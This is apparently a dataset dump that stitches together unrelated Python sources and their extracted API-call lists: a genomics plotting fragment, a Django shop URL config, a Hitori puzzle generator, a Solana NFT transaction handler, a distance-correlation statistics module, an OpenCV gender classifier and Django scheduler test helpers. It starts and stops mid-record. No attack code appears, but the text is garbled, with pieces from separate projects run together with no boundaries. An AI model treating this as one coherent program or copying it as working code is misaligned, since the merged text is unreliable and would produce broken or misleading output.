'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (18004, 18017), True, 'import numpy as np\n'), ((18161, 18208), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (18178, 18208), True, 'import numpy as np\n'), ((18219, 18261), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (18232, 18261), True, 'import numpy as np\n'), ((18271, 18314), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (18284, 18314), True, 'import numpy as np\n'), ((18318, 18341), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (18325, 18341), True, 'import seaborn as sns\n'), ((18409, 18421), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18419, 18421), True, 'import matplotlib.pyplot as plt\n'), ((18424, 18570), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'metric': 'dist', 'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], metric=dist, row_cluster=True,\n col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (18438, 18570), True, 'import seaborn as sns\n'), ((18618, 18638), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (18629, 18638), True, 'import matplotlib.pyplot as plt\n'), ((18707, 18718), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (18716, 18718), True, 'import matplotlib.pyplot as plt\n'), ((21275, 21296), 'seaborn.set', 'sns.set', ([], {'font_scale': '(2)'}), '(font_scale=2)\n', (21282, 21296), True, 'import seaborn as sns\n'), ((21299, 21345), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(param_matrix.shape[1], 4)'}), '(figsize=(param_matrix.shape[1], 4))\n', (21309, 21345), True, 'import matplotlib.pyplot as plt\n'), ((21348, 21443), 'seaborn.heatmap', 'sns.heatmap', (['param_matrix'], {'cmap': '"""PRGn"""', 'linewidths': '(0.2)', 'vmin': '(-param_range)', 'vmax': 'param_range'}), "(param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range,\n vmax=param_range)\n", (21359, 21443), True, 'import seaborn as sns\n'), ((21478, 21487), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (21485, 21487), True, 'import matplotlib.pyplot as plt\n'), ((21614, 21634), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (21625, 21634), True, 'import matplotlib.pyplot as plt\n'), ((21637, 21648), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (21646, 21648), True, 'import matplotlib.pyplot as plt\n'), ((23772, 23795), 'seaborn.set', 'sns.set', ([], {'font_scale': '(1.3)'}), '(font_scale=1.3)\n', (23779, 23795), True, 'import seaborn as sns\n'), ((23798, 23810), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (23808, 23810), True, 'import matplotlib.pyplot as plt\n'), ((23813, 23846), 'seaborn.distplot', 'sns.distplot', (['f_scores'], {'kde': '(False)'}), '(f_scores, kde=False)\n', (23825, 23846), True, 'import seaborn as sns\n'), ((23849, 23874), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""ReLU output"""'], {}), "('ReLU output')\n", (23859, 23874), True, 'import matplotlib.pyplot as plt\n'), ((23877, 23897), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (23888, 23897), True, 'import matplotlib.pyplot as plt\n'), ((23900, 23911), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (23909, 23911), True, 'import matplotlib.pyplot as plt\n'), ((3110, 3140), 'os.path.isdir', 'os.path.isdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3123, 3140), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((3146, 3171), 'os.mkdir', 'os.mkdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3154, 3171), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4674, 4804), 'basenji.batcher.BatcherF', 'basenji.batcher.BatcherF', (['test_seqs1', 'test_targets', 'test_targets_imag'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, test_targets_imag,\n batch_size=dr.batch_size, pool_width=job['target_pool'])\n", (4698, 4804), False, 'import basenji\n'), ((4869, 4979), 'basenji.batcher.Batcher', 'basenji.batcher.Batcher', (['test_seqs1', 'test_targets'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n", (4892, 4979), False, 'import basenji\n'), ((5066, 5078), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (5076, 5078), True, 'import tensorflow as tf\n'), ((5355, 5366), 'time.time', 'time.time', ([], {}), '()\n', (5364, 5366), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10067, 10084), 'numpy.transpose', 'np.transpose', (['pwm'], {}), '(pwm)\n', (10079, 10084), True, 'import numpy as np\n'), ((11127, 11146), 'numpy.array', 'np.array', (['pwm_freqs'], {}), '(pwm_freqs)\n', (11135, 11146), True, 'import numpy as np\n'), ((16161, 16193), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (16180, 16193), False, 'from sklearn import preprocessing\n'), ((17836, 17871), 'numpy.swapaxes', 'np.swapaxes', (['filter_outs_mean', '(2)', '(1)'], {}), '(filter_outs_mean, 2, 1)\n', (17847, 17871), True, 'import numpy as np\n'), ((17928, 17960), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (17947, 17960), False, 'from sklearn import preprocessing\n'), ((22080, 22101), 'numpy.ravel', 'np.ravel', (['filter_outs'], {}), '(filter_outs)\n', (22088, 22101), True, 'import numpy as np\n'), ((23363, 23403), 'subprocess.call', 'subprocess.call', (['weblogo_cmd'], {'shell': '(True)'}), '(weblogo_cmd, shell=True)\n', (23378, 23403), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((5263, 5289), 'numpy.squeeze', 'np.squeeze', (['filter_weights'], {}), '(filter_weights)\n', (5273, 5289), True, 'import numpy as np\n'), ((8287, 8317), 'numpy.ravel', 'np.ravel', (['filter_outs[:, :, f]'], {}), '(filter_outs[:, :, f])\n', (8295, 8317), True, 'import numpy as np\n'), ((15289, 15350), 'scipy.stats.spearmanr', 'spearmanr', (['filter_outs_seq[:, fi]', 'seq_targets[:num_seqs, ti]'], {}), '(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\n', (15298, 15350), False, 'from scipy.stats import spearmanr\n'), ((4289, 4300), 'time.time', 'time.time', ([], {}), '()\n', (4298, 4300), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10281, 10299), 'numpy.log2', 'np.log2', (['bg_pwm[j]'], {}), '(bg_pwm[j])\n', (10288, 10299), True, 'import numpy as np\n'), ((10325, 10353), 'numpy.log2', 'np.log2', (['(pseudoc + pwm[i][j])'], {}), '(pseudoc + pwm[i][j])\n', (10332, 10353), True, 'import numpy as np\n'), ((19977, 20012), 'numpy.max', 'np.max', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (19983, 20012), True, 'import numpy as np\n'), ((20024, 20059), 'numpy.min', 'np.min', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (20030, 20059), True, 'import numpy as np\n'), ((20173, 20206), 'numpy.max', 'np.max', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\n', (20179, 20206), True, 'import numpy as np\n'), ((20209, 20242), 'numpy.min', 'np.min', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\n', (20215, 20242), True, 'import numpy as np\n'), ((10779, 10798), 'numpy.array', 'np.array', (['([1.0] * 4)'], {}), '([1.0] * 4)\n', (10787, 10798), True, 'import numpy as np\n'), ((10954, 10974), 'numpy.array', 'np.array', (['([0.25] * 4)'], {}), '([0.25] * 4)\n', (10962, 10974), True, 'import numpy as np\n')] |
from django.urls import path
from . import views
app_name = "shop"
urlpatterns = [
path('', views.HomePage.as_view(), name="home-page"),
path('shop/', views.ProductListView.as_view(), name="product-list"),
path('shop/<int:category_pk>/', views.ProductListView.as_view(), name="product-list"),
path('shop/products/<int:pk>/', views.ProductDetailView.as_view(), name="product-detail"),
path('cart/', views.cart_view, name="cart"),
path('cart/add/<int:product_pk>/', views.add_product_to_order, name="add-product-to-cart"),
path('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json, name="add-product-to-cart-json"),
path('checkout/', views.CheckOut.as_view(), name="checkout"),
path('checkout/<int:address_pk>/', views.CheckOut.as_view(), name="checkout"),
path('payment/', views.PaymentChoice.as_view(), name="payment-choice"),
path('payment/order/<int:pk>/', views.MomoPayment.as_view(), name="momo-payment"),
path('payment/momo/<int:pk>/confirm/', views.ConfirmMomoPayment.as_view(), name="confirm-momo-payment"),
path('orders/', views.OrderList.as_view(), name="order-list"),
path('orders/<int:pk>/', views.OrderDetail.as_view(), name="order-detail"),
path('orders/<int:order_id>/items/<int:pk>/', views.OrderItemDetail.as_view(), name="order-item-detail"),
]
| [
"django.urls.path"
] | [((406, 449), 'django.urls.path', 'path', (['"""cart/"""', 'views.cart_view'], {'name': '"""cart"""'}), "('cart/', views.cart_view, name='cart')\n", (410, 449), False, 'from django.urls import path\n'), ((455, 550), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/"""', 'views.add_product_to_order'], {'name': '"""add-product-to-cart"""'}), "('cart/add/<int:product_pk>/', views.add_product_to_order, name=\n 'add-product-to-cart')\n", (459, 550), False, 'from django.urls import path\n'), ((551, 659), 'django.urls.path', 'path', (['"""cart/add/<int:product_pk>/json/"""', 'views.add_product_to_cart_json'], {'name': '"""add-product-to-cart-json"""'}), "('cart/add/<int:product_pk>/json/', views.add_product_to_cart_json,\n name='add-product-to-cart-json')\n", (555, 659), False, 'from django.urls import path\n')] |
from hitori_generator import Generator
from argparse import ArgumentParser
def generate(n: int, output_file: str) -> None:
if n < 3 or n > 8:
print("It isn't valid size")
exit(4)
generator = Generator(n)
data = generator.generate()
lines = map(lambda x: ' '.join(map(str, x)), data)
with open(output_file, 'w', encoding='utf-8') as f:
f.write('\n'.join(lines))
def main():
p = ArgumentParser()
p.add_argument('filename', type=str, help='Path to output file')
p.add_argument('-s', "--size", type=int, default=3, help='Generate SxS field. size must be in [3, 8]. Default is 3')
args = p.parse_args()
generate(args.size, args.filename)
if __name__ == '__main__':
main()
| [
"hitori_generator.Generator",
"argparse.ArgumentParser"
] | [((217, 229), 'hitori_generator.Generator', 'Generator', (['n'], {}), '(n)\n', (226, 229), False, 'from hitori_generator import Generator\n'), ((429, 445), 'argparse.ArgumentParser', 'ArgumentParser', ([], {}), '()\n', (443, 445), False, 'from argparse import ArgumentParser\n')] |
from common.make_tx import make_swap_tx
from sol.handle_simple import handle_unknown_detect_transfers
def handle_metaplex(exporter, txinfo):
transfers_in, transfers_out, _ = txinfo.transfers_net
if len(transfers_in) == 1 and len(transfers_out) == 1:
sent_amount, sent_currency, _, _ = transfers_out[0]
received_amount, received_currency, _, _ = transfers_in[0]
row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)
exporter.ingest_row(row)
else:
handle_unknown_detect_transfers(exporter, txinfo)
def is_nft_mint(txinfo):
log_instructions = txinfo.log_instructions
transfers_in, transfers_out, _ = txinfo.transfers_net
if "MintTo" in log_instructions and len(transfers_out) == 1 and len(transfers_in) == 0:
return True
elif ("MintTo" in log_instructions
and len(transfers_out) == 1
and len(transfers_in) == 1
and transfers_in[0][0] == 1):
return True
else:
return False
def handle_nft_mint(exporter, txinfo):
transfers_in, transfers_out, transfers_unknown = txinfo.transfers_net
if len(transfers_in) == 1 and len(transfers_out) == 1:
sent_amount, sent_currency, _, _ = transfers_out[0]
received_amount, received_currency, _, _ = transfers_in[0]
row = make_swap_tx(txinfo, sent_amount, sent_currency, received_amount, received_currency)
exporter.ingest_row(row)
return
handle_unknown_detect_transfers(exporter, txinfo)
| [
"common.make_tx.make_swap_tx",
"sol.handle_simple.handle_unknown_detect_transfers"
] | [((1494, 1543), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (1525, 1543), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((403, 491), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (415, 491), False, 'from common.make_tx import make_swap_tx\n'), ((539, 588), 'sol.handle_simple.handle_unknown_detect_transfers', 'handle_unknown_detect_transfers', (['exporter', 'txinfo'], {}), '(exporter, txinfo)\n', (570, 588), False, 'from sol.handle_simple import handle_unknown_detect_transfers\n'), ((1356, 1444), 'common.make_tx.make_swap_tx', 'make_swap_tx', (['txinfo', 'sent_amount', 'sent_currency', 'received_amount', 'received_currency'], {}), '(txinfo, sent_amount, sent_currency, received_amount,\n received_currency)\n', (1368, 1444), False, 'from common.make_tx import make_swap_tx\n')] |
"""
Functions for testing independence of several distributions.
The functions in this module provide methods for testing if
the samples generated from two random vectors are independent.
"""
import numpy as np
import scipy.stats
from . import _dcor_internals, _hypothesis
from ._dcor import u_distance_correlation_sqr
from ._utils import _random_state_init, _transform_to_2d
def distance_covariance_test(
x,
y,
*,
num_resamples=0,
exponent=1,
random_state=None,
n_jobs=1,
):
"""
Test of distance covariance independence.
Compute the test of independence based on the distance
covariance, for two random vectors.
The test is a permutation test where the null hypothesis is that the two
random vectors are independent.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
exponent: float
Exponent of the Euclidean distance, in the range :math:`(0, 2)`.
Equivalently, it is twice the Hurst parameter of fractional Brownian
motion.
num_resamples: int
Number of permutations resamples to take in the permutation test.
random_state: {None, int, array_like, numpy.random.RandomState}
Random state to generate the permutations.
Returns
-------
HypothesisTest
Results of the hypothesis test.
See Also
--------
distance_covariance
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> dcor.independence.distance_covariance_test(a, a)
HypothesisTest(p_value=1.0, statistic=208.0)
>>> dcor.independence.distance_covariance_test(a, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=11.75323056...)
>>> dcor.independence.distance_covariance_test(b, b)
HypothesisTest(p_value=1.0, statistic=1.3604610...)
>>> dcor.independence.distance_covariance_test(a, b,
... num_resamples=5, random_state=0)
HypothesisTest(p_value=0.5, statistic=11.7532305...)
>>> dcor.independence.distance_covariance_test(a, b,
... num_resamples=5, random_state=13)
HypothesisTest(p_value=0.3333333..., statistic=11.7532305...)
>>> dcor.independence.distance_covariance_test(a, a,
... num_resamples=7, random_state=0)
HypothesisTest(p_value=0.125, statistic=208.0)
"""
x = _transform_to_2d(x)
y = _transform_to_2d(y)
_dcor_internals._check_same_n_elements(x, y)
random_state = _random_state_init(random_state)
# Compute U-centered matrices
u_x = _dcor_internals._distance_matrix_generic(
x,
centering=_dcor_internals.double_centered,
exponent=exponent)
u_y = _dcor_internals._distance_matrix_generic(
y,
centering=_dcor_internals.double_centered,
exponent=exponent)
# Use the dcov statistic
def statistic_function(distance_matrix):
return u_x.shape[0] * _dcor_internals.mean_product(
distance_matrix, u_y)
return _hypothesis._permutation_test_with_sym_matrix(
u_x,
statistic_function=statistic_function,
num_resamples=num_resamples,
random_state=random_state,
n_jobs=n_jobs)
def partial_distance_covariance_test(
x,
y,
z,
*,
num_resamples=0,
exponent=1,
random_state=None,
n_jobs=1,
):
"""
Test of partial distance covariance independence.
Compute the test of independence based on the partial distance
covariance, for two random vectors conditioned on a third.
The test is a permutation test where the null hypothesis is that the first
two random vectors are independent given the third one.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
z: array_like
Observed random vector. The columns correspond with the individual
random variables while the rows are individual instances of the random
vector.
num_resamples: int
Number of permutations resamples to take in the permutation test.
random_state: {None, int, array_like, numpy.random.RandomState}
Random state to generate the permutations.
Returns
-------
HypothesisTest
Results of the hypothesis test.
See Also
--------
partial_distance_covariance
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> c = np.array([[1000, 0, 0, 1000],
... [0, 1000, 1000, 1000],
... [1000, 1000, 1000, 1000],
... [1000, 1000, 0, 1000]])
>>> dcor.independence.partial_distance_covariance_test(a, a, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=142.6664416...)
>>> dcor.independence.partial_distance_covariance_test(a, b, c)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=7.2690070...e-15)
>>> dcor.independence.partial_distance_covariance_test(b, b, c)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=1.0, statistic=2.2533380...e-30)
>>> dcor.independence.partial_distance_covariance_test(a, b, c,
... num_resamples=5, random_state=0)
HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15)
>>> dcor.independence.partial_distance_covariance_test(a, b, c,
... num_resamples=5, random_state=13)
HypothesisTest(p_value=0.1666666..., statistic=7.2690070...e-15)
>>> dcor.independence.partial_distance_covariance_test(a, c, b,
... num_resamples=7, random_state=0)
HypothesisTest(p_value=1.0, statistic=-7.5701764...e-12)
"""
random_state = _random_state_init(random_state)
# Compute U-centered matrices
u_x = _dcor_internals._u_distance_matrix(x, exponent=exponent)
u_y = _dcor_internals._u_distance_matrix(y, exponent=exponent)
u_z = _dcor_internals._u_distance_matrix(z, exponent=exponent)
# Compute projections
proj = _dcor_internals.u_complementary_projection(u_z)
p_xz = proj(u_x)
p_yz = proj(u_y)
# Use the pdcor statistic
def statistic_function(distance_matrix):
return u_x.shape[0] * _dcor_internals.u_product(
distance_matrix, p_yz)
return _hypothesis._permutation_test_with_sym_matrix(
p_xz,
statistic_function=statistic_function,
num_resamples=num_resamples,
random_state=random_state,
n_jobs=n_jobs)
def distance_correlation_t_statistic(x, y):
"""
Transformation of the bias corrected version of distance correlation used
in :func:`distance_correlation_t_test`.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
Returns
-------
numpy scalar
T statistic.
See Also
--------
distance_correlation_t_test
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_statistic(a, a)
inf
>>> dcor.independence.distance_correlation_t_statistic(a, b)
... # doctest: +ELLIPSIS
-0.4430164...
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_statistic(b, b)
inf
"""
bcdcor = u_distance_correlation_sqr(x, y)
n = x.shape[0]
v = n * (n - 3) / 2
return np.sqrt(v - 1) * bcdcor / np.sqrt(1 - bcdcor**2)
def distance_correlation_t_test(x, y):
"""
Test of independence for high dimension based on convergence to a Student t
distribution. The null hypothesis is that the two random vectors are
independent.
Parameters
----------
x: array_like
First random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
y: array_like
Second random vector. The columns correspond with the individual random
variables while the rows are individual instances of the random vector.
Returns
-------
HypothesisTest
Results of the hypothesis test.
See Also
--------
distance_correlation_t_statistic
Examples
--------
>>> import numpy as np
>>> import dcor
>>> a = np.array([[1, 2, 3, 4],
... [5, 6, 7, 8],
... [9, 10, 11, 12],
... [13, 14, 15, 16]])
>>> b = np.array([[1, 0, 0, 1],
... [0, 1, 1, 1],
... [1, 1, 1, 1],
... [1, 1, 0, 1]])
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_test(a, a)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=0.0, statistic=inf)
>>> dcor.independence.distance_correlation_t_test(a, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=0.6327451..., statistic=-0.4430164...)
>>> with np.errstate(divide='ignore'):
... dcor.independence.distance_correlation_t_test(b, b)
... # doctest: +ELLIPSIS
HypothesisTest(p_value=0.0, statistic=inf)
"""
t_test = distance_correlation_t_statistic(x, y)
n = x.shape[0]
v = n * (n - 3) / 2
df = v - 1
p_value = 1 - scipy.stats.t.cdf(t_test, df=df)
return _hypothesis.HypothesisTest(p_value=p_value, statistic=t_test)
| [
"numpy.sqrt"
] | [((9268, 9292), 'numpy.sqrt', 'np.sqrt', (['(1 - bcdcor ** 2)'], {}), '(1 - bcdcor ** 2)\n', (9275, 9292), True, 'import numpy as np\n'), ((9242, 9256), 'numpy.sqrt', 'np.sqrt', (['(v - 1)'], {}), '(v - 1)\n', (9249, 9256), True, 'import numpy as np\n')] |
#coding=utf-8
#性别识别
import cv2
from keras.models import load_model
import numpy as np
import chineseText
img = cv2.imread("img/gather.png")
face_classifier = cv2.CascadeClassifier(
"d:\Python36\Lib\site-packages\opencv-master\data\haarcascades\haarcascade_frontalface_default.xml"
)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_classifier.detectMultiScale(
gray, scaleFactor=1.2, minNeighbors=3, minSize=(140, 140))
gender_classifier = load_model(
"classifier/gender_models/simple_CNN.81-0.96.hdf5")
gender_labels = {0: '女', 1: '男'}
color = (255, 255, 255)
for (x, y, w, h) in faces:
face = img[(y - 60):(y + h + 60), (x - 30):(x + w + 30)]
face = cv2.resize(face, (48, 48))
face = np.expand_dims(face, 0)
face = face / 255.0
gender_label_arg = np.argmax(gender_classifier.predict(face))
gender = gender_labels[gender_label_arg]
cv2.rectangle(img, (x, y), (x + h, y + w), color, 2)
img = chineseText.cv2ImgAddText(img, gender, x + h, y, color, 30)
cv2.imshow("Image", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
| [
"cv2.rectangle",
"keras.models.load_model",
"cv2.imshow",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.cvtColor",
"numpy.expand_dims",
"cv2.CascadeClassifier",
"cv2.resize",
"cv2.imread",
"chineseText.cv2ImgAddText"
] | [((113, 141), 'cv2.imread', 'cv2.imread', (['"""img/gather.png"""'], {}), "('img/gather.png')\n", (123, 141), False, 'import cv2\n'), ((160, 299), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""d:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml"""'], {}), "(\n 'd:\\\\Python36\\\\Lib\\\\site-packages\\\\opencv-master\\\\data\\\\haarcascades\\\\haarcascade_frontalface_default.xml'\n )\n", (181, 299), False, 'import cv2\n'), ((296, 333), 'cv2.cvtColor', 'cv2.cvtColor', (['img', 'cv2.COLOR_BGR2GRAY'], {}), '(img, cv2.COLOR_BGR2GRAY)\n', (308, 333), False, 'import cv2\n'), ((460, 522), 'keras.models.load_model', 'load_model', (['"""classifier/gender_models/simple_CNN.81-0.96.hdf5"""'], {}), "('classifier/gender_models/simple_CNN.81-0.96.hdf5')\n", (470, 522), False, 'from keras.models import load_model\n'), ((1010, 1034), 'cv2.imshow', 'cv2.imshow', (['"""Image"""', 'img'], {}), "('Image', img)\n", (1020, 1034), False, 'import cv2\n'), ((1035, 1049), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (1046, 1049), False, 'import cv2\n'), ((1050, 1073), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (1071, 1073), False, 'import cv2\n'), ((685, 711), 'cv2.resize', 'cv2.resize', (['face', '(48, 48)'], {}), '(face, (48, 48))\n', (695, 711), False, 'import cv2\n'), ((723, 746), 'numpy.expand_dims', 'np.expand_dims', (['face', '(0)'], {}), '(face, 0)\n', (737, 746), True, 'import numpy as np\n'), ((886, 938), 'cv2.rectangle', 'cv2.rectangle', (['img', '(x, y)', '(x + h, y + w)', 'color', '(2)'], {}), '(img, (x, y), (x + h, y + w), color, 2)\n', (899, 938), False, 'import cv2\n'), ((949, 1008), 'chineseText.cv2ImgAddText', 'chineseText.cv2ImgAddText', (['img', 'gender', '(x + h)', 'y', 'color', '(30)'], {}), '(img, gender, x + h, y, color, 30)\n', (974, 1008), False, 'import chineseText\n')] |
from django.test import TestCase
from os import path
from rest_framework import status
from rest_framework.test import APIClient
import random
from scheduler.models import Profile
from scheduler.factories import (
CourseFactory,
SpacetimeFactory,
UserFactory,
ProfileFactory,
SectionFactory,
AttendanceFactory,
OverrideFactory,
create_attendances_for,
)
random.seed(0)
COURSE_NAMES = ("CS88", "CS61A", "CS61B", "CS70", "CS61C", "EE16A")
ROLE_MAP = Profile.ROLE_MAP
BASE_PATH = "/scheduler"
# ----- REQUEST UTILITIES -----
def fail_msg(ep, resp):
return "Endpoint: {}\nResponse Content: {}".format(ep, resp.content)
class APITestCase(TestCase):
def get_client_for(self, user):
"""Returns an APIClient object that is logged in as the provided user."""
client = APIClient()
client.force_authenticate(user)
return client
def request(self, method, endpoint, exp_code=None, data=None):
"""
Performs a request to the specified endpoint and returns the response object.
Also checks if the status code of the response is exp_code, if provided.
The method parameter should be a get/post/etc from an APIClient object.
"""
resp = method(path.join(BASE_PATH, endpoint.strip("/")), follow=True, data=data)
if exp_code is not None:
self.assertEqual(resp.status_code, exp_code, msg=fail_msg(endpoint, resp))
return resp
def req_fails_perms(self, method, endpoint, data=None):
"""
Performs a request to the specified endpoint, and checks that it fails
due to the user lacking proper permissions.
The method parameter should be a get/post/etc from an APIClient object.
Returns the response object afterwards.
"""
return self.request(
method, endpoint, exp_code=status.HTTP_403_FORBIDDEN, data=data
)
def req_fails_method(self, method, endpoint, data=None):
"""
Performs a request to the specified endpoint, and checks that it fails
due to the endpoint not supporting the provided method.
Returns the response object.
"""
return self.request(
method, endpoint, exp_code=status.HTTP_405_METHOD_NOT_ALLOWED, data=data
)
def req_succeeds(self, method, endpoint, data=None):
"""
Performs a request to the specified endpoint, and checks that it succeeds.
The method parameter should be a get/post/etc from an APIClient object.
Returns the response object.
"""
return self.request(method, endpoint, exp_code=status.HTTP_200_OK, data=data)
# ----- MODEL GENERATION -----
def random_objs(clazz, n=1):
"""
Generates N instances of the provided class, retrieved from the database.
"""
src = clazz.objects.all()
for _ in range(n):
yield random.choice(src)
def make_test_courses():
"""Creates course objects and persists them to database."""
return [CourseFactory.create(name=name) for name in COURSE_NAMES]
def make_test_users(n):
"""Creates N test users and persists them to database."""
return UserFactory.create_batch(n)
def give_role(user, role, course):
"""
Creates a profile for USER in a given ROLE for the provided COURSE, and
saves the profile to database.
"""
return ProfileFactory.create(
user=user, course=course, leader=None, section=None, role=role
)
def create_empty_section_for(mentor):
"""
Creates a section for MENTOR without populated students.
"""
return SectionFactory.create(course=mentor.course, mentor=mentor)
def enroll_user_as_student(user, section):
"""
Creates a student profile for USER, and assigns them to the given SECTION.
Also creates blank attendances as necessary.
Returns the created profile.
"""
student = give_role(user, Profile.STUDENT, section.course)
student.section = section
student.leader = section.leader
create_attendances_for(student)
return student
def gen_test_data(cls, NUM_USERS=300):
"""
Adds NUM_USERS users to the database and initializes profiles for them as follows:
- 2 coords per course
- 4 SMs per coord, each with a section of 3-6 students
- 3 JMs per SM, each with a section of 3-6 students
"""
users = iter(make_test_users(NUM_USERS))
courses = make_test_courses()
# for sanity tests, everyone only has one role for now
num_courses = len(courses)
coords, seniors, juniors, students = [], [], [], []
COORD_COUNT = 2
SM_COUNT = 4
JM_COUNT = 3
def assign(role, leader, c, lst):
# returns the profile created
profile = give_role(next(users), role, c)
profile.leader = leader
lst.append(profile)
return profile
try:
for c in courses:
# coords
for i in range(COORD_COUNT):
coord = assign(Profile.COORDINATOR, None, c, coords)
# SMs
for j in range(SM_COUNT):
sm = assign(Profile.SENIOR_MENTOR, coord, c, seniors)
section = create_empty_section_for(sm)
for k in range(random.randint(3, 6)):
students.append(enroll_user_as_student(next(users), section))
# JMs
for k in range(JM_COUNT):
jm = assign(Profile.JUNIOR_MENTOR, sm, c, juniors)
for _ in range(random.randint(3, 6)):
students.append(
enroll_user_as_student(next(users), section)
)
except StopIteration:
pass
cls.users = users
cls.courses = courses
cls.coords = coords
cls.seniors = seniors
cls.juniors = juniors
cls.students = students
| [
"random.choice",
"scheduler.factories.create_attendances_for",
"scheduler.factories.UserFactory.create_batch",
"random.seed",
"rest_framework.test.APIClient",
"scheduler.factories.SectionFactory.create",
"scheduler.factories.ProfileFactory.create",
